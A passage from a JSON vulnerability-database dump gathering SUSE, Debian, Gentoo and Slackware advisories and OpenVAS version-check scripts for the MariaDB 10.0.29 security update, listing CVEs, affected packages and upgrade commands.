unspecified vulnerability affecing the DML component\n (bsc#1020877)\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n * XtraDB updated to 5.6.34-79.1\n * TokuDB updated to 5.6.34-79.1\n * Innodb updated to 5.6.35\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog:\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-release-notes\">https://kb.askmonty.org/en/mariadb-10029-release-notes</a>\n * <a rel=\"nofollow\" href=\"https://kb.askmonty.org/en/mariadb-10029-changelog\">https://kb.askmonty.org/en/mariadb-10029-changelog</a>\n\n", "modified": "2017-02-07T18:11:31", "published": "2017-02-07T18:11:31", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00013.html", "id": "SUSE-SU-2017:0412-1", "type": "suse", "title": "Security update for mariadb (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:05:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3770-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 22, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mariadb-10.0\nCVE ID : CVE-2016-6664 CVE-2017-3238 CVE-2017-3243 CVE-2017-3244\n CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3291\n CVE-2017-3312 CVE-2017-3317 CVE-2017-3318\nDebian Bug : 842895 851755\n\nSeveral issues have been discovered in the MariaDB database server. The\nvulnerabilities are addressed by upgrading MariaDB to the new upstream\nversion 10.0.29. Please see the MariaDB 10.0 Release Notes for further\ndetails:\n\n https://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-01-22T12:31:07", "published": "2017-01-22T12:31:07", "id": "DEBIAN:DSA-3770-1:8F221", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00021.html", "title": "[SECURITY] [DSA 3770-1] mariadb-10.0 security update", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-02-21T01:00:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "edition": 1, "description": "### Background\n\nMariaDB is an enhanced, drop-in replacement for MySQL.\n\n### Description\n\nMultiple vulnerabilities have been discovered in MariaDB. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could possibly escalate privileges, gain access to critical data or complete access to all MariaDB Server accessible data, or cause a Denial of Service condition via unspecified vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MariaDB users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mariadb-10.0.29\"", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "href": "https://security.gentoo.org/glsa/201702-18", "id": "GLSA-201702-18", "title": "MariaDB: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318"], "description": "New mariadb packages are available for Slackware 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mariadb-10.0.29-i586-1_slack14.2.txz: Upgraded.\n This update fixes several security issues.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3238\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3243\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3244\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3257\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3258\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3291\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3312\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3317\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3318\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mariadb-5.5.54-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mariadb-5.5.54-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mariadb-10.0.29-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mariadb-10.0.29-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mariadb-10.0.29-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/mariadb-10.0.29-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\n63065db92d769dba9fd1b991d4895fa6 mariadb-5.5.54-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne56de4b0a2e44a9d05d98da8ed887b2b mariadb-5.5.54-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nebe1dcbc543c3a9fab5b16fe49cc751c mariadb-10.0.29-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n13ad470dacc9135be578c1507d65d742 mariadb-10.0.29-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nea988b7da09571fb7e4338f492640e95 ap/mariadb-10.0.29-i586-1.txz\n\nSlackware x86_64 -current package:\n059885939b05ae2553d4e537c8edd189 ap/mariadb-10.0.29-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mariadb-10.0.29-i586-1_slack14.2.txz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2017-01-18T20:40:17", "published": "2017-01-18T20:40:17", "id": "SSA-2017-018-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634", "type": "slackware", "title": "[slackware-security] mariadb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29.", "modified": "2019-03-18T00:00:00", "published": "2017-01-22T00:00:00", "id": "OPENVAS:1361412562310703770", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703770", "type": "openvas", "title": "Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3770.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3770-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703770\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_name(\"Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-22 00:00:00 +0100 (Sun, 22 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3770.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"mariadb-10.0 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name:\"summary\", value:\"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.29-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:57:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for\nfurther details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/", "modified": "2017-07-07T00:00:00", "published": "2017-01-22T00:00:00", "id": "OPENVAS:703770", "href": "http://plugins.openvas.org/nasl.php?oid=703770", "type": "openvas", "title": "Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3770.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3770-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703770);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_name(\"Debian Security Advisory DSA 3770-1 (mariadb-10.0 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-01-22 00:00:00 +0100 (Sun, 22 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3770.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mariadb-10.0 on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 10.0.29-0+deb8u1.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\");\n script_tag(name: \"summary\", value: \"Several issues have been discovered in\nthe MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB\nto the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for\nfurther details:\n\nhttps://mariadb.com/kb/en/mariadb/mariadb-10029-release-notes/\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmariadbd-dev\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-client-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-common\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-connect-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-oqgraph-engine-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-server-core-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mariadb-test-10.0\", ver:\"10.0.29-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:28:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-02-17T00:00:00", "id": "OPENVAS:1361412562310851490", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851490", "type": "openvas", "title": "openSUSE: Security Advisory for mariadb (openSUSE-SU-2017:0486-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851490\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-17 05:51:43 +0100 (Fri, 17 Feb 2017)\");\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\",\n \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\",\n \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for mariadb (openSUSE-SU-2017:0486-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mariadb'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This mariadb version update to 10.0.29 fixes the following issues:\n\n - CVE-2017-3318: unspecified vulnerability affecting Error Handling\n (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in mysqld_safe,\n incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL component\n (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the DML component\n (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the Charsets\n component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the Optimizer\n component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL (libmysqlclient.so) had\n a use-after-free issue that could cause the applications to crash\n (bsc#1022428)\n\n - notable changes:\n\n * XtraDB updated to 5.6.34-79.1\n\n * TokuDB updated to 5.6.34-79.1\n\n * Innodb updated to 5.6.35\n\n * Performance Schema updated to 5.6.35\n\n Release notes and changelog are linked in the references.\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"mariadb on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:0486-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10029-release-notes\");\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10029-changelog\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n 